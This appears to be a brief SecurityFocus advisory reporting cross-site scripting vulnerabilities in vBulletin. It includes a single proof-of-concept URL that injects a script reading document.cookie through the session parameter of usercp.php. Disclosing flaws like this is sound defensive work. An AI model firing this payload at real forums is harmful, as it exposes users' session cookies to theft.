Multiple VBulletin Cross Site Scripting Vulnerabilities

The following proof of concept was provided:

http://<victim>/usercp.php?s=[Session ID]">&lt;Script&gt;alert(document.cookie);&lt;/Script&gt;


 

Privacy Statement
Copyright 2010, SecurityFocus